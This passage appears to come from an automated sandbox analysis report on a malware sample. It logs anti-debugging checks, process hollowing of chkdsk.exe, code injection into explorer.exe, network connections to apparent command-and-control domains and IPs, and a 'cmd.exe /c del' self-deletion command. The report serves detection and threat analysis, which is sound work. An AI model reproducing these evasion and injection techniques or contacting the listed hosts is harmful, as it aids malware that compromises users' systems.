          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E55BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D91B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D91B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E3D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E58B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_00409B40 LdrLoadDll,
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 166.88.62.202 80
          Source: C:\Windows\explorer.exeDomain query: www.casatowerofficial.com
          Source: C:\Windows\explorer.exeDomain query: www.bitconga.com
          Source: C:\Windows\explorer.exeDomain query: www.totalwinerewards.com
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.243.200 80
          Source: C:\Windows\explorer.exeDomain query: www.tothelaundry.com
          Source: C:\Windows\explorer.exeDomain query: www.omnipets.store
          Source: C:\Windows\explorer.exeNetwork Connect: 46.252.151.235 80
          Source: C:\Windows\explorer.exeNetwork Connect: 18.231.72.25 80
          Source: C:\Windows\explorer.exeDomain query: www.webarate.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.experiencedlawfirms.com
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeSection unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 90000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeMemory written: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeThread register set: target process: 3352
          Source: C:\Windows\SysWOW64\chkdsk.exeThread register set: target process: 3352
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess created: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"
          Source: explorer.exe, 00000005.00000000.381888349.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.363941533.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.348780458.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.443876033.0000000000B68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman\Pr
          Source: explorer.exe, 00000005.00000000.364384709.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.349323841.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.444216866.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.382222275.00000000011E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.386172183.0000000005E10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.364384709.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.349323841.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.444216866.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.382222275.00000000011E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.364384709.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.349323841.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.444216866.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.382222275.00000000011E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.364384709.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.349323841.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.444216866.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.382222275.00000000011E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.374858871.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.390116935.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.356172587.0000000008778000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
